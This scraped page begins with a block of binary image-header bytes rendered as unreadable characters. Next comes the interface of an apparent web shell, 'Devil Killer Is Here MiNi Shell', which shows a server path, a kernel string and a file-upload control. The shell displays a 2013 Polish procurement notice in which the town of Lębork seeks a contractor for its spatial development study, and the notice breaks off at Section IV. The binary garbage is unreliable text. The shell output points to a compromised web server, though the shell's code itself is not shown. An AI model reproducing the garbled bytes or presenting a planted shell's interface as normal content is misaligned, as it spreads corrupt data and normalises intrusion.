JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130107/7948-N-2013.html

<p class="kh_header"><b>Lębork: Opracowanie
PROJEKTU STUDIUM UWARUNKOWAŃ I KIERUNKÓW ZAGOSPODAROWANIA PRZESTRZENNEGO MIASTA LĘBORKA</b><br>
<b>Numer ogłoszenia: 7948 - 2013; data zamieszczenia: 07.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Lębork , ul. Armii Krajowej 14, 84-300 Lębork, woj. pomorskie, tel. 59 862 42 80, faks 59 862 24 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lebork.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie
PROJEKTU STUDIUM UWARUNKOWAŃ I KIERUNKÓW ZAGOSPODAROWANIA PRZESTRZENNEGO MIASTA LĘBORKA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie:
PROJEKTU STUDIUM UWARUNKOWAŃ I KIERUNKÓW  ZAGOSPODAROWANIA PRZESTRZENNEGO MIASTA LĘBORKA.

1.Zamówienie obejmuje:

a) sporządzenie projektu studium uwarunkowań i kierunków  zagospodarowania   
przestrzennego miasta Lęborka, w oparciu o  Uchwałę Nr XVIII-231/2012 Rady 
Miejskiej w Lęborku z dnia 16.05.2012r. w sprawie przystąpienia do sporządzenia   
studium uwarunkowań i kierunków zagospodarowania miasta Lęborka stanowiącą 
załącznik do umowy - załącznika nr 2 do SIWZ, z uwzględnieniem  wniosków  
zgłoszonych w związku z zawiadomieniem o podjęciu uchwały przez Radę Miejską 
w Lęborku o przystąpieniu do sporządzania studium.
Granice opracowania wyznaczają granice administracyjne Gminy Miasto Lębork.
Powierzchnia opracowania -  1786 ha.
Opracowanie winno uwzględniać wymagania wynikające z:
- ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym  
(tekst jednolity Dz. U. z 2012r., poz.647)
- rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004r. w sprawie   
zakresu projektu studium uwarunkowań i kierunków zagospodarowania 
przestrzennego gminy (Dz. U. Nr 118, poz.11233)
- ustawy z dnia  3 października 2008r. o udostępnieniu informacji o środowisku
i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach  
oddziaływania na środowisko (Dz. U. Nr 199, poz.1227, z późn. zmianami) 
- innych obowiązujących przepisów prawa, dotyczących przedmiotu zamówienia.

b) pozyskanie przez Wykonawcę na jego koszt w jego własnym zakresie map  
topograficznych w skali 1:5000 pochodzących z państwowego zasobu  
geodezyjnego i kartograficznego oraz innych map (np. zasadnicze, katastralne)  
niezbędnych do wykonania materiałów planistycznych na potrzeby projektu 
studium. 

c) wykonanie:
- analizy i  diagnozy stanu istniejącego,
- opracowań studialnych dotyczących podstawowych zagadnień rozstrzyganych       
w studium ze szczególnym uwzględnieniem problematyki rozwoju układu 
drogowego,
- roboczej wersji projektu studium,
- projektu studium do uzgadniania i opiniowania oraz do wyłożenia do  
publicznego wglądu,
- projektu studium do uchwalenia.

d) wykonanie:
- opracowania ekofizjograficznego,
- prognozy oddziaływania ustaleń studium na środowisko,
- uzasadnienia i podsumowania o którym mowa w art. 42 i art. 55 ust. 3 ustawy
z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego   
ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach  
oddziaływania na środowisko (Dz. U. Nr 199, poz.1227, z późn. zmianami).

2. Sposób opracowania projektu studium winien umożliwiać pozyskanie danych   
statystycznych zgodnie z wymogami GUS w tym w zakresie  przeznaczenia  
terenów pod określone funkcje i wielkości ich powierzchni. 

3. Sposób opracowania projektu studium winien  umożliwiać wydawanie wypisów       
i wyrysów dla poszczególnych nieruchomości. 

4. Opracowanie przedmiotu zamówienia składać się będzie z następujących   
etapów wymagających akceptacji Zamawiającego:
a) etap I  -  analizy i  diagnozy stanu istniejącego, opracowanie ekofizjograficzne,
b) etap II -  opracowania studialne dotyczące podstawowych zagadnień  
rozstrzyganych w studium ze szczególnym uwzględnieniem  problematyki rozwoju układu drogowego, robocza wersja projektu studium,
c) etap III - projekt studium i prognoza oddziaływania na środowisko do uzgodnień 
i opiniowania oraz projekt studium i prognoza oddziaływania na środowisko do wyłożenia do publicznego wglądu,
d) etap IV - projekt studium z ewentualnymi poprawkami po przyjęciu uwag do  
uchwalenia przez Radę Miejską oraz podsumowanie i uzasadnienie, o którym mowa w art. 42 i art. 55 ust. 3 ustawy z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego ochronie,  udziale społeczeństwa w ochronie środowiska oraz o ocenach  oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227, z późn. zmianami).

5.Szczegółowy zakres zamówienia (udział Zamawiającego i Wykonawcy w kolejnych  
etapach procedury planistycznej):
a) etap I:
1) Zamawiający ogłasza w miejscowej prasie oraz przez obwieszczenie, a także 
w sposób zwyczajowo przyjęty w danej miejscowości, o podjęciu  uchwały 
o przystąpieniu do sporządzania studium, określając formę, miejsce i termin  składania wniosków do studium;
2) Zamawiający zawiadamia na piśmie o podjęciu uchwały o przystąpieniu do 
sporządzania studium instytucje i organy właściwe do uzgadniania i opiniowania studium;
3) Zamawiający zbiera wnioski, o których mowa w pkt.1 i przekazuje je
 Wykonawcy;
4) Wykonawca analizuje wnioski do studium i określa sposób ich uwzględnienia
 w projekcie studium;
5) Wykonawca przygotowuje odpowiednie pisma przewodnie  a Zamawiający występuje o uzgodnienie zakresu i stopnia szczegółowości informacji wymaganych 
w prognozie oddziaływania na środowisko a po uzyskaniu uzgodnień Zamawiający przekazuje  je Wykonawcy;
6) Wykonawca przekaże Zamawiającemu w celu przeprowadzenia  wewnętrznego opiniowania kolejno poniższe opracowania:
- analizy i diagnozy stanu istniejącego, 
- opracowanie ekofizjograficzne;
7) Zamawiający przekaże Wykonawcy ustalenia wynikające  z wewnętrznego  opiniowania opracowań wymienionych w pkt. 6;
8) Wykonawca po uwzględnieniu ustaleń, o których mowa w pkt. 7 przekaże    
Zamawiającemu ostateczne wersje opracowań wymienionych w pkt. 6;
b) etap II:
9) Wykonawca przekaże  Zamawiającemu w celu przeprowadzenia  
wewnętrznego opiniowania kolejno poniższe opracowania:
-opracowania studialne dotyczące podstawowych zagadnień rozstrzyganych 
w studium ze szczególnym uwzględnieniem problematyki rozwoju układu  
drogowego, 
-roboczą wersję projektu studium;
10) Zamawiający przekaże Wykonawcy ustalenia wynikające z wewnętrznego  opiniowania opracowań wymienionych w pkt. 9;
11) Wykonawca po uwzględnieniu ustaleń, o których mowa w pkt. 10 przekaże    
Zamawiającemu ostateczne wersje opracowań wymienionych w pkt. 9;
c) etap III:
12) Wykonawca przekaże Zamawiającemu:
-projekt studium wraz z niezbędnymi opracowaniami (prognoza oddziaływania   
na środowisko) do  zaopiniowania przez  Miejską Komisję Urbanistyczno-
Architektoniczną; 
13) Zamawiający przedstawia Miejskiej Komisji Urbanistyczno-          Architektonicznej do zaopiniowania opracowanie wymienione w pkt. 12, a po 
otrzymaniu opinii, rozpatruje uwagi wniesione przez Komisję, po uzyskaniu 
stanowiska Wykonawcy; 
14) Wykonawca po dokonaniu zmian w projekcie studium wynikających 
z ewentualnych uwag  Miejskiej Komisji Urbanistyczno-Architektonicznej  
przekaże Zamawiającemu:
-projekt studium wraz z niezbędnymi opracowaniami (prognoza oddziaływania  
na środowisko) do  uzgodnień i opiniowania,
-wykaz organów administracji i instytucji, do których projekt zostanie 
skierowany celem opiniowania i uzgadniania;
15) Zamawiający ustala termin przedstawienia uzgodnień i opinii;
16) Wykonawca przygotowuje odpowiednie pisma przewodnie 
a Zamawiający występuje o opinie i uzgodnienia a po ich otrzymaniu 
przekazuje Wykonawcy w celu sporządzenia ich wykazu  oraz rozpatruje je 
po uzyskaniu stanowiska Wykonawcy;
17) Wykonawca wprowadza niezbędne korekty do projektu studium, wynikające 
z procedury uzgadniania i opiniowania zgodnie z rozstrzygnięciem 
Zamawiającego;
18) Wykonawca po dokonaniu korekt wymienionych w pkt. 17 przekaże 
Zamawiającemu projekt studium wraz z prognozą oddziaływania na 
środowisko do wyłożenia do publicznego wglądu;
19) Zamawiający określa termin wyłożenia projektu studium do publicznego 
wglądu;
20) Zamawiający ogłasza w prasie miejscowej oraz przez obwieszczenie,
a także w sposób zwyczajowo przyjęty w danej miejscowości, o wyłożeniu 
projektu  studium do publicznego wglądu;
21) Zamawiający  wyznacza w ogłoszeniu, o którym mowa w pkt.20, termin,  
w którym osoby fizyczne i prawne oraz jednostki organizacyjne nieposiadające  
osobowości prawnej mogą wnosić uwagi dotyczące projektu studium; 
22) Zamawiający wykłada projekt studium wraz z prognozą oddziaływania na  
środowisko do publicznego wglądu;
23) Zamawiający organizuje w czasie wyłożenia dyskusję publiczną nad  
przyjętymi w projekcie studium rozwiązaniami.
W dyskusji tej uczestniczy Wykonawca;
24) Zamawiający przyjmuje ewentualne uwagi, o których mowa w pkt.21 
i  rozpatruje je, po uzyskaniu stanowiska Wykonawcy;
25) Zamawiający po rozpatrzeniu wniesionych uwag do projektu studium  
powiadamia Wykonawcę o swoich decyzjach określając zakres niezbędnych  
poprawek do projektu studium;
d) etap IV:
26) Wykonawca po uwzględnieniu rozstrzygnięć wymienionych w pkt. 25   
przekaże Zamawiającemu projekt studium do uchwalenia przez Radę Miejską wraz
z sporządzoną przez Wykonawcę listą nieuwzględnionych uwag, o których mowa
w pkt. 21 i uzasadnieniem ich odrzucenia;
27) Wykonawca przekaże Zamawiającemu podsumowanie i uzasadnienie 
o którym mowa w art. 42 i art. 55 ust. 3 ustawy z dnia 3 października 2008r.   
o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa 
w ochronie środowiska oraz o ocenach oddziaływania na środowisko   
(Dz. U. Nr  199, poz. 1227, z późn. zmianami);
28) Zamawiający przedstawia do uchwalenia Radzie Miejskiej projekt studium 
wraz z listą nieuwzględnionych uwag do projektu studium;
29) W przypadku stanowiska Rady Miejskiej co do konieczności dokonania zmian 
w przedstawionym do uchwalenia projekcie studium, w tym także w wyniku 
uwzględnienia uwag do projektu studium, Zamawiający i Wykonawca ponawia czynności opisane wyżej, w zakresie niezbędnym do dokonania tych zmian;
30) Wykonawca po dokonaniu czynności, o których mowa w pkt.29 przekazuje
projekt studium Zamawiającemu w formie:
- do uchwalenia przez Radę Miejską;
31) Zamawiający po podjęciu uchwały przez Radę Miejską przedstawia ją wraz         
z załącznikami oraz dokumentacją prac planistycznych wojewodzie w celu  
oceny  zgodności z przepisami prawnymi.

6. Wszelkie prace projektowe lub czynności nie opisane powyżej, a wynikające          
z procedur określonych w ustawie z dnia 27 marca 2003r. o planowaniu                    
i zagospodarowaniu przestrzennym (tekst jednolity Dz. U. z 2012r., poz.647) oraz 
przepisach szczególnych, niezbędne do właściwego i kompletnego opracowania 
zamówienia Wykonawca winien wykonać w ramach przedmiotu zamówienia              
i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia.

7. Zamówienie obejmuje wykonanie i dostarczenie Zamawiającemu do jego siedziby,  
to jest w Urzędzie Miejskim w Lęborku przedmiotu zamówienia w następujących  
formach: 
a) etap I
1. analizy i  diagnozy stanu istniejącego:
- 2 egz. w formie papierowej i 1 egz. w formie elektronicznej (płyta CD),
2. opracowanie ekofizjograficzne:
- 2 egz. w formie papierowej i 1 egz.  w formie elektronicznej (1 płyta CD),
b) etap II
1. opracowania studialne dotyczące podstawowych zagadnień rozstrzyganych 
w studium ze szczególnym uwzględnieniem problematyki rozwoju układu  
drogowego:
- 2 egz. w formie papierowej i 1 egz. w formie elektronicznej (płyta CD),
2. robocza wersja projektu studium:
- 2 egz. w formie papierowej i 1 egz. w formie elektronicznej (płyta CD),
c) etap III
1.projekt studium i prognoza oddziaływania na środowisko do uzgodnień 
i  opiniowania: 
- ilość egz. w formie papierowej odpowiadająca ilości organów i instytucji oraz   
dodatkowy 1 egz.
2.projekt studium i prognoza oddziaływania na środowisko do wyłożenia do 
publicznego wglądu:
-  2 egz. w formie papierowej i 1 egz. w formie elektronicznej (płyta CD),
d) etap IV
1.projekt studium z ewentualnymi poprawkami po przyjęciu uwag do  
uchwalenia przez Radę Miejską:
- część graficzna studium w technice barwnej w skali 1: 5 000 - 6 egz.
w tym 1 egz. w technice barwnej podklejony folią, 
- część tekstowa - 6 egz. w formie papierowej, 
- część tekstowa i graficzna studium w wersji elektronicznej (płyta CD) - część  
tekstowa studium w formacie Word, część graficzna studium w formacie umożliwiającym publikację na stronie internetowej miasta (np. PDF). 
- rozstrzygnięcie o sposobie rozpatrzenia uwag - 6 egz. w formie papierowej
i 1 egz. w formie elektronicznej (płyta CD),
2.podsumowanie i uzasadnienie, o którym mowa w art. 42 i art. 55 ust. 3 ustawy
z dnia 3 października 2008r. o udostępnianiu informacji o środowisku i jego  
ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach 
oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227, z późn. zmianami):
- 2 egz. w formie papierowej i 1 egz. w formie elektronicznej (płyta CD)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W trakcie realizacji przedmiotu zamówienia Zamawiający może udzielić zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych. Zamówienia te mogą polegać na zleceniu dodatkowych usług                
w zakresie opracowania studium uwarunkowań i kierunków zagospodarowania przestrzennego. Zamawiający przewiduje możliwość zlecenia zamówień  
uzupełniających w wysokości nie przekraczającej 50% wartości zamówienia podstawowego.
Ewentualna realizacja zamówień uzupełniających wiąże się z podpisaniem odrębnej umowy po przeprowadzonych negocjacjach w trybie zamówienia z wolnej ręki.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 13.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków przeprowadzona będzie w oparciu o przedłożone oświadczenie na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony, jeżeli - Wykonawca zrealizował       
w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania,       
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa opracowania: studium lub zmiany studium  uwarunkowań i kierunków zagospodarowania  przestrzennego sporządzone według procedur i problematyki określonych w ustawie z dnia 27 marca 2003r.  o planowaniu i zagospodarowaniu przestrzennym (tekst jednolity Dz. U. z 2012r. poz. 647) dla całego obszaru gminy
w tym jedno opracowanie obejmujące cały obszar gminy miejskiej lub gminy miejsko-wiejskiej (za  wykonanie studium uważa się jego uchwalenie).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków przeprowadzona będzie w oparciu o przedłożone oświadczenie na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek został spełniony, jeżeli - Wykonawca:
	- dysponuje osobą, posiadającą kwalifikacje do pełnienia funkcji głównego  
	projektanta studium. Główny projektant studium musi posiadać aktualne 
	zaświadczenie o członkostwie w Izbie Urbanistów oraz posiadać  doświadczenie
	w wykonaniu (samodzielnie lub w zespole) w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest  krótszy - w tym okresie, co najmniej dwóch  opracowań: studium lub zmiany studium uwarunkowań i kierunków zagospodarowania  przestrzennego sporządzonych według procedur i problematyki określonych w ustawie z  dnia 27 marca 2003r.        
	o planowaniu i zagospodarowaniu przestrzennym  tekst jednolity Dz. U. z 2012r. poz. 647) dla całego obszaru gminy w tym  jedno opracowanie  obejmujące cały 
	obszar gminy miejskiej lub gminy miejsko-wiejskiej (za wykonanie studium uważa się jego uchwalenie),
	- dysponuje specjalistami (z wyłączeniem głównego projektanta) w dziedzinie:   
	komunikacji, ochrony dziedzictwa kulturowego, ochrony środowiska, 
	infrastruktury technicznej, którzy będą wykonywać zamówienie. Każda z tych osób musi posiadać doświadczenie w wykonaniu co najmniej dwóch opracowań z zakresu problematyki studium uwarunkowań i kierunków  zagospodarowania przestrzennego, 
	- dysponuje osobą lub osobami wykonującymi opracowania ekofizjograficzne,  
	które muszą posiadać doświadczenie w wykonaniu w/wym. opracowań. 
	Co najmniej jedna osoba musi wykazać się sporządzeniem w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej dwóch opracowań ekofizjograficznych do studium lub zmiany studium uwarunkowań i kierunków zagospodarowania  przestrzennego dla całego obszaru gminy w tym jedno studium lub zmiana studium  obejmujące cały obszar gminy miejskiej lub gminy miejsko-wiejskiej,
	- dysponuje osobą lub osobami wykonującymi prognozę oddziaływania na  
	środowisko, które muszą posiadać doświadczenie w wykonaniu w/wym. prognozy. Co najmniej jedna osoba musi wykazać się sporządzeniem w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch opracowań w/wym. prognozy do studium lub zmiany studium uwarunkowań i kierunków zagospodarowania  przestrzennego dla całego obszaru gminy w tym jedno studium lub zmiana studium obejmujące cały obszar gminy miejskiej lub gminy miejsko-wiejskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków przeprowadzona będzie w oparciu o przedłożone oświadczenie na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku działania Wykonawcy przez pełnomocników, należy dołączyć do oferty pełnomocnictwo.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
